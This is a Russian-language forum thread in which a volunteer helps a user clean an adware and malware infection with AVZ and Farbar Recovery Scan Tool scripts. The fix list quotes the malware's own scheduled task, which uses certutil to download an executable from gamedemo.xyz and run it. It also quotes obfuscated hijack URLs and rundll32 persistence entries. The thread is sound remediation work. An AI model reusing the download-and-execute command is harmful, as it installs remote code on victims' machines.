• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена Поймал вирус, после загрузки "недо-чита"

shutg

Новый пользователь
Сообщения
11
Реакции
0
Баллы
1
Здравствуйте.
Последняя надежда, так сказать, на Вашу помощь....
Перепробывал многие утилиты, вручную чистил, все равно ничего не меняется, вылезает реклама сайта
THEGOODCASTER.COM и еще какие то без домена, как я полагаю.
Помогите...
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Здравствуйте!

Через Панель управления - Удаление программ - удалите нежелательное ПО:
IObit Software Updater
Main service
SafeFinder
YoutubeAdBlock
Элементы Яндекса 8.0 для Internet Explorer
Что не получится удалить стандартно, удалите принудительно через Geek Uninstaller

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:
{Исправление в службах в реестре, значения ImagePath.
Данный скрипт распространяется свободно и может быть модифицирован по согласованию с авторами - представителями SafeZone.cc
При публикации скрипта данный комментарий и ссылка на VirusNet.Info обязательна. }
var DescriptionTextWuauServ, DispayNameTextWuauServ, DescriptionTextBITS: String;
 DispayNameTextBITS, FullPathSystem32, NameFolderSystem32, FileServiceDll: String;  
 ImagePathStr, RootStr, SubRootStr, LangID: string;
 AllRoots, AllKeys, RootsRestored, KeysRestored, KeysFixed: integer;
 FinishMsg, RestoreMsg, FixMsg, CheckMsg: String; 
 RegSectMsg, ParamMsg, ParamValueMsg, InRegSectMsg, CorrectMsg, RestMsg: String;

procedure CheckAndRestoreSection(Root: String);
begin
 Inc(AllRoots);
 if RegKeyExistsEx('HKLM', Root) then
   RegKeyResetSecurity('HKLM', Root)
 else
  begin
    Inc(RootsRestored);
    RegKeyCreate('HKLM', Root);
    AddToLog(RegSectMsg + Root + RestMsg);
   end;
end;

procedure CheckAndRestoreSubSection;
begin
  CheckAndRestoreSection(SubRootStr);
end;

procedure RestoredMsg(Root, Param: String);
begin
  AddToLog(ParamMsg + Param + InRegSectMsg + Root + RestMsg);
  Inc(KeysRestored);
end;

procedure FixedMsg(Root, Param: String);
begin
  AddToLog(ParamValueMsg + Param + InRegSectMsg + Root + CorrectMsg);
  Inc(KeysFixed);
end;

procedure RestoreStrParam(Root, Param, Value: String);
begin
  RegKeyStrParamWrite('HKLM', Root, Param, Value);
  RestoredMsg(Root, Param);
end;

procedure CheckAndRestoreStrParam(Root, Param, Value: String);
begin
  Inc(AllKeys);
  if not RegKeyParamExists('HKLM', Root, Param) then
    RestoreStrParam(Root, Param, Value);
end;

procedure CheckAndRestoreIntParam(Root, Param: String; Value: Integer);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', Root, Param) then 
  begin
    RegKeyIntParamWrite('HKLM', Root, Param, Value);
    RestoredMsg(Root, Param);
  end;
end;

procedure CheckAndRestoreMultiSZParam(Param, Value: String);
begin
 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, Param) then
  begin
    ExecuteFile('REG ADD HKLM\' + RootStr + ' /v ' + Param + Value, '', 0, 10000, true);
    RestoredMsg(RootStr, Param);
  end;
end;

// Исправление значения параметра ImagePath для служб 'wuauserv' и 'BITS'
procedure ImagePathFix(Node, Srv: String);
var RegStr: String;
begin
 RegStr := 'SYSTEM\' + Node + '\Services\' + Srv;
 if RegKeyExistsEx('HKLM', RegStr) then
  begin
    Inc(AllKeys);
    RegKeyResetSecurity('HKLM', RegStr);
    RegKeyStrParamWrite('HKLM', RegStr, 'ImagePath', ImagePathStr);
    FixedMsg(RegStr, 'ImagePath');
  end;
end;

{ Выполнение исправление всех ключей в ветках -
   'HKLM\SYSTEM\CurrentControlSet\Services\BITS' и 'HKLM\SYSTEM\CurrentControlSet\Services\wuauserv'}
procedure CorrectRegistryRoot(DescriptionText, DisplayNameText, Srv: String);
var FileServiceDll, CCSNumber: string;
     i : integer;
begin
 if Srv = 'BITS' then
   FileServiceDll := FullPathSystem32 + 'qmgr.dll'
 else
   FileServiceDll := FullPathSystem32 + 'wuauserv.dll';
 RootStr:= 'SYSTEM\CurrentControlSet\Services\' + Srv;

 CheckAndRestoreSection(RootStr);

 CheckAndRestoreStrParam(RootStr, 'Description', DescriptionText);
 CheckAndRestoreStrParam(RootStr, 'DisplayName', DisplayNameText);
 CheckAndRestoreStrParam(RootStr, 'ObjectName', 'LocalSystem');

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', RootStr, 'ImagePath') then
   RestoreStrParam(RootStr, 'ImagePath', ImagePathStr)
 else
  begin
    Dec(AllKeys);
    if LowerCase(RegKeyStrParamRead('HKLM', RootStr, 'ImagePath')) <> LowerCase(ImagePathStr) then
      for i:= 0 to 999 do
       begin
         if i > 0 then
           CCSNumber := FormatFloat('ControlSet000', i)
         else
           CCSNumber := 'CurrentControlSet';
         ImagePathFix(CCSNumber, Srv);
      end;
   end;

 CheckAndRestoreIntParam(RootStr, 'ErrorControl', 1);
 CheckAndRestoreIntParam(RootStr, 'Start', 2);
 CheckAndRestoreIntParam(RootStr, 'Type', 32);

 if Srv = 'BITS' then
  begin
    CheckAndRestoreMultiSZParam('DependOnService', ' /t REG_MULTI_SZ /d RpcSs');
    CheckAndRestoreMultiSZParam('DependOnGroup', ' /t REG_MULTI_SZ');
  end;

 SubRootStr:= RootStr + '\Enum';
 CheckAndRestoreSubSection;

 CheckAndRestoreStrParam(SubRootStr, '0', 'Root\LEGACY_' + UpperCase(Srv) + '\0000');
 CheckAndRestoreIntParam(SubRootStr, 'Count', 1);
 CheckAndRestoreIntParam(SubRootStr, 'NextInstance', 1);

 SubRootStr := RootStr + '\Security';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'Security') then
  begin
    RegKeyBinParamWrite('HKLM', SubRootStr, 'Security', '01,00,14,80,78,00,00,00,84,00,00,00,14,00,00,00,30,00,00,00,02,00,1c,00,01,00,00,00,02,80,14,00,ff,00,0f,00,01,01,00,00,00,00,00,01,00,00,00,00,02,00,48,00,03,00,00,00,00,00,14,00,9d,00,02,00,01,01,00,00,00,00,00,05,0b,00,00,00,00,00,18,00,ff,01,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,00,00,14,00,ff,01,0f,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00,01,01,00,00,00,00,00,05,12,00,00,00');
    RestoredMsg(SubRootStr, 'Security');
  end;

 SubRootStr:= RootStr + '\Parameters';
 CheckAndRestoreSubSection;

 Inc(AllKeys);
 if not RegKeyParamExists('HKLM', SubRootStr, 'ServiceDll') then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    RestoredMsg(SubRootStr, 'ServiceDll');
  end
 else if LowerCase(RegKeyStrParamRead('HKLM', SubRootStr, 'ServiceDll')) <> LowerCase(FileServiceDll) then
  begin
    RegKeyParamWrite('HKLM', SubRootStr, 'ServiceDll', 'REG_EXPAND_SZ', FileServiceDll);
    FixedMsg(SubRootStr, 'ServiceDll');
  end
end;

{ Главное выполнение }
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp');
 TerminateProcessByName('C:\Program Files (x86)\Sending\807482082.exe');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp');
 TerminateProcessByName('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe');
 TerminateProcessByName('c:\windows\rss\csrss.exe');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp');
 TerminateProcessByName('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
 QuarantineFile('C:\Program Files (x86)\Sending\807482082.exe', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
 QuarantineFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
 QuarantineFile('c:\windows\rss\csrss.exe', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
 QuarantineFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
 QuarantineFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
 QuarantineFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '');
 QuarantineFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-9ib87.tmp\0azhp2m0ygx.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-90ino.tmp\254qbvv2tp4.tmp', '');
 DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-sjkgu.tmp\aszr4hfqqps.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-811fj.tmp\b555vdpewj0.tmp', '');
 DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '');
 DeleteFile('c:\windows\rss\csrss.exe', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-31mu9.tmp\kevyn4knivc.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-14oc5.tmp\m4usqulpfrg.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-tkbjk.tmp\pv4tygyx1ma.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-p6q61.tmp\vuplm23ayky.tmp', '');
 DeleteFile('c:\users\ad35~1\appdata\local\temp\is-59mf1.tmp\w11b02mylic.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-IPNII.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-8F4VL.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-PGT87.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-7M6FH.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-NLD3F.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{21D3E532-D556-4E29-8EF9-96E6FD93EB94}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{40DD8514-79A7-48D0-8206-2E626B333957}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{F636453F-8024-46F6-A8EA-0BBAFF8F135C}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\{C86C5379-828F-4975-AC53-A4D8F8ECBEFD}\{89F63FAC-A1A9-4F15-8C69-30276525D384}.tmp', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-S60QV.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-V36C1.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-UBAVD.tmp\idp.dll', '');
 DeleteFile('C:\Users\AD35~1\AppData\Local\Temp\is-G8QPQ.tmp\idp.dll', '');
 DeleteFile('C:\Windows\System32\drivers\WinmonProcessMonitor.sys', '64');
 DeleteFile('C:\Program Files (x86)\Sending\807482082.exe', '64');
 DeleteFile('C:\Users\Компауктер\AppData\Local\App\svchost.exe', '64');
 DeleteFile('C:\Windows\rss\csrss.exe', '64');
 DeleteFile('c:\users\Компауктер\appdata\local\temp\csrss\cloudnet.exe', '64');
 ClearLog;
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\wuauserv', 'wuauserv.reg');
 ExpRegKey('HKLM', 'SYSTEM\CurrentControlSet\Services\BITS', 'BITS.reg');
 LangID:= RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Nls\Language', 'InstallLanguage'); 
 if LangID = '0419' then
  begin
    DescriptionTextWuauServ := 'Включает загрузку и установку обновлений Windows. Если служба отключена, то на этом компьютере нельзя будет использовать возможности автоматического обновления или веб-узел Центра обновления Windows.';
    DispayNameTextWuauServ := 'Автоматическое обновление';
    DescriptionTextBITS := 'Обеспечивает передачу данных между клиентами и серверами в фоновом режиме. Если служба BITS отключена, такие возможности, как Windows Update, не могут правильно работать.';
    DispayNameTextBITS := 'Фоновая интеллектуальная служба передачи (BITS)';
    AddToLog('Операционная система - русская');
    FinishMsg := '–––– Восстановление завершено ––––';
    RestoreMsg := 'Восстановлено разделов\параметров: ';
    FixMsg := 'Исправлено параметров: ';
    CheckMsg := 'Проверено разделов\параметров: ';
    RegSectMsg := 'Раздел реестра HKLM\';
    ParamMsg := 'Параметр ';
    ParamValueMsg := 'Значение параметра ';
    InRegSectMsg := ' в разделе реестра HKLM\';
    CorrectMsg := ' исправлено на оригинальное.';
    RestMsg := 'восстановлен.';
  end
 else if LangID = '0409' then
  begin
    DescriptionTextWuauServ := 'Enables the download and installation of Windows updates. If this service is disabled, this computer will not be able to use the Automatic Updates feature or the Windows Update Web site.';
    DispayNameTextWuauServ := 'Automatic Updates'; 
    DescriptionTextBITS := 'Transfers data between clients and servers in the background. If BITS is disabled, features such as Windows Update will not work correctly.';
    DispayNameTextBITS := 'Background Intelligent Transfer Service';
    AddToLog('Operation system - english');
    FinishMsg := '–––– Restoration finished ––––';
    RestoreMsg := 'Sections\parameters restored: ';
    FixMsg := 'Parameters corrected: ';
    CheckMsg := 'Sections\parameters checked: ';
    RegSectMsg := 'Registry section HKLM\';
    ParamMsg := 'Parameter ';
    ParamValueMsg := 'Value of parameter ';
    InRegSectMsg := ' in registry section HKLM\';
    CorrectMsg := ' corrected on original.';
    RestMsg := ' restored.';
  end;
 AddToLog('');

{ Определение папки X:\Windows\System32\ }
 NameFolderSystem32 := RegKeyStrParamRead('HKLM', 'SYSTEM\CurrentControlSet\Control\Windows', 'SystemDirectory');
 ImagePathStr := NameFolderSystem32 + '\svchost.exe -k netsvcs';
 Delete(NameFolderSystem32, 1, pos('\', NameFolderSystem32) - 1);
 FullPathSystem32 := GetEnvironmentVariable('WinDir') + NameFolderSystem32 + '\';
 
 AllRoots := 0;
 AllKeys := 0;
 RootsRestored := 0;
 KeysRestored := 0;
 KeysFixed := 0;

 CorrectRegistryRoot(DescriptionTextBITS, DispayNameTextBITS, 'BITS');
 CorrectRegistryRoot(DescriptionTextWuauServ, DispayNameTextWuauServ, 'wuauserv');

 AddToLog('');
 AddToLog(FinishMsg);
 AddToLog('');
 AddToLog(RestoreMsg + IntToStr(RootsRestored) + ' \ ' + IntToStr(KeysRestored));
 AddToLog(FixMsg + IntToStr(KeysFixed));
 AddToLog(CheckMsg + IntToStr(AllRoots) + ' \ ' + IntToStr(AllKeys));
 SaveLog(RegKeyStrParamRead('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders', 'Desktop') + '\Correct_wuauserv&BITS.log');
 DeleteSchedulerTask('csrss');
 RegKeyDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\Synapse3', '64');
 RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','Synapse3', '32');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','Software\Microsoft\Windows\CurrentVersion\RunOnce','i2ggdebicrf', '64');
 RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\App','command', '64');
 DeleteService('WinmonProcessMonitor');
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
RebootWindows(true);
end.
Компьютер перезагрузится.
После выполнения скрипта на рабочем столе появится текстовый файл Correct_wuauserv&BITS.log. Его необходимо прикрепить к следующему посту.


После перезагрузки, выполните такой скрипт:

Код:
begin
 DeleteFile(GetAVZDirectory+'quarantine.7z');
 ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine .\Quarantine\*', 1, 300000, false);
end.
Файл quarantine.7z из папки с распакованной утилитой AVZ отправьте с помощью формы отправки карантина или на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: malware в теле письма.



Для повторной диагностики запустите снова AutoLogger.
Прикрепите к следующему сообщению свежий CollectionLog.
 

shutg

Новый пользователь
Сообщения
11
Реакции
0
Баллы
1
Нежелательные вроде как удалил.
 

Вложения

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Скачайте Farbar Recovery Scan Tool (или с зеркала) и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с вашей операционной системой. Если вы не уверены, какая версия подойдет для вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на вашей системе.
Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt и Addition.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

Sandor

Ассоциация VN/VIP
Преподаватель
Сообщения
5,576
Реакции
1,857
Баллы
563
Нежелательные вроде как удалил
По-прежнему в списке установленных
Main service
YoutubeAdBlock
Удалите принудительно.

Затем:
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    CloseProcesses:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [YoungWood] => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [ç'2+plA#p8.exe] => C:\Program Files\Windows NT\9IOMHVSST0TCI8Y35LF2TZR6E\ç'2+plA#p8.exe 
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [2705260] => C:\Users\Компауктер\AppData\Roaming\zu4amnvtgvr\254qbvv2tp4.exe [1866371 2019-07-17] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [6583976] => C:\Users\Компауктер\AppData\Roaming\crnof3twn1e\kevyn4knivc.exe [1866371 2019-07-17] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7574684] => C:\Users\Компауктер\AppData\Roaming\4qavsr3x335\w11b02mylic.exe [1866371 2019-07-17] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3884524] => C:\Users\Компауктер\AppData\Roaming\ch51whag4gk\0azhp2m0ygx.exe [1866371 2019-07-17] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [7809743] => C:\Users\Компауктер\AppData\Roaming\g1qxn0urxz0\m4usqulpfrg.exe [1866371 2019-07-18] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [GIBTQCD27PGP7SR] => C:\Program Files\CZLZVGPLWK\CZLZVGPLW.exe [1005568 2019-07-18] (1VYUW) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3981224] => C:\Users\Компауктер\AppData\Roaming\jclyrksahme\hemqvsph1fz.exe [1866371 2019-07-18] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [CloudNet] => C:\Users\Компауктер\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe [683008 2019-07-18] (EpicNet Inc.) [File not signed] <==== ATTENTION
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [3327155] => C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c\3hxl4zyymnv.exe [1866371 2019-07-18] ( ) [File not signed]
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\...\Run: [DUOZ9792LTR9WU0] => C:\Program Files\KACSYMBLU9\KACSYMBLU.exe [1005568 2019-07-18] (1VYUW) [File not signed]
    GroupPolicy: Restriction - Chrome <==== ATTENTION
    CHR HKLM\SOFTWARE\Policies\Google: Restriction <==== ATTENTION
    Task: {008418BB-1111-4982-8B82-E778F1744239} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://gamedemo.xyz/app/app.exe C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Компауктер\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {2FFC31DC-6D13-4B2D-9295-6FF7DA5F046B} - System32\Tasks\raSRPAMuIMRBbwMvC2 => rundll32 "C:\Program Files (x86)\woOqILJDRwqbnTOZbgR\vzSXBiV.dll",#1
    Task: {7990DB9E-56F6-4C42-B5CF-B71969AFA0D4} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [5132288 2019-07-18] () [File not signed] <==== ATTENTION
    Task: {B01AA887-1515-4316-89B6-B9BA05C5956E} - System32\Tasks\AWWcazHJnUfLPA => rundll32 "C:\Program Files (x86)\WOFbcaOaHmAU2\yonHRkgDQgQOz.dll",#1
    Task: {BD8C4F29-6FFA-416F-8F99-D8835E92C1F3} - System32\Tasks\txgYfgWClJeJBSoaCDR2 => rundll32 "C:\Program Files (x86)\BbdjrrKUeUXuC\MmTSDoE.dll",#1
    Task: {E0B2FD73-0171-4618-855B-416F93A4755E} - System32\Tasks\JSpPUlYEOjGQEpF2 => rundll32 "C:\Program Files (x86)\rZdaClXBU\oHkDgO.dll",#1
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWZLttF1PLftx8e-A0mT1gaR0iEWkR_mU_knkeAAUhMOYpLAoaHp_mjGfba5uSW4OqnXi17v_VV2XQj_8OXYUfFLzNC9uGz&q={searchTerms}
    HKU\S-1-5-21-3178948822-1392076464-1111708920-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoGtusdZo2wa5vPziXtpMHiFAFEZjecz_bZMTRqZ3nD6F3eD7RCOwMHSRa41YdeJb_fO9PhwadGhtSPWVB_ZJXfy9v33Oqj52VEDQ0UHnJBybNdPZqcsGN6dGgFOgr0I9aejHCgpAp3VZAwSiGGBlxkyzCPyo5k8BYXoqdBe6K7Fs
    SearchScopes: HKLM-x32 -> DefaultScope value is missing
    FF Homepage: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.HP
    FF NewTab: Mozilla\Firefox\Profiles\nahd6ha2.default -> file:///C:/ProgramData/Quoteexs/ff.NT
    C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\idmfcgobgdhohmmpmldpceldejenflci
    C:\Users\Компауктер\AppData\Roaming\Opera Software\Opera Stable\Extensions\nknpohplagminmhchlbhigcgcdfigion
    R2 WinDefender; C:\Windows\windefender.exe [0 0000-00-00] (Access Denied) <==== ATTENTION (Access Denied)
    S2 Main Service; C:\Program Files (x86)\MachinerData\ModularInstaller.exe [2801470 2019-07-18] () [File not signed]
    2019-07-18 13:26 - 2019-07-18 13:27 - 000000000 ____D C:\Users\Компауктер\AppData\LocalLow\fuXIbnpPYAACF
    2019-07-18 13:26 - 2019-07-18 13:26 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
    2019-07-18 13:25 - 2019-07-18 13:25 - 000003208 _____ C:\Windows\System32\Tasks\csrss
    2019-07-18 13:02 - 2019-07-18 13:02 - 000003202 _____ C:\Windows\System32\Tasks\AWWcazHJnUfLPA
    2019-07-18 13:02 - 2019-07-18 13:02 - 000002872 _____ C:\Windows\System32\Tasks\raSRPAMuIMRBbwMvC2
    2019-07-18 13:02 - 2019-07-18 13:02 - 000002860 _____ C:\Windows\System32\Tasks\txgYfgWClJeJBSoaCDR2
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\o4wnkfzf33c
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Users\Все пользователи\JrsbweBqGiQFiyVB
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\ProgramData\JrsbweBqGiQFiyVB
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files\KACSYMBLU9
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\woOqILJDRwqbnTOZbgR
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\WOFbcaOaHmAU2
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\vONNFjhTKIE
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\uvtpOaoQoRUn
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\rZdaClXBU
    2019-07-18 13:02 - 2019-07-18 13:02 - 000000000 ____D C:\Program Files (x86)\BbdjrrKUeUXuC
    2019-07-18 12:42 - 2019-07-18 13:25 - 000003516 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\jclyrksahme
    2019-07-18 12:42 - 2019-07-18 12:42 - 000000000 ____D C:\Program Files\CZLZVGPLWK
    2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\gtktbi2qeg4
    2019-07-18 02:48 - 2019-07-18 02:48 - 000000000 ____D C:\Program Files\D24SXXXQ3N
    2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Users\Компауктер\AppData\Roaming\khun2zmqo4f
    2019-07-18 02:28 - 2019-07-18 02:28 - 000000000 ____D C:\Program Files\LWAKZUUI1M
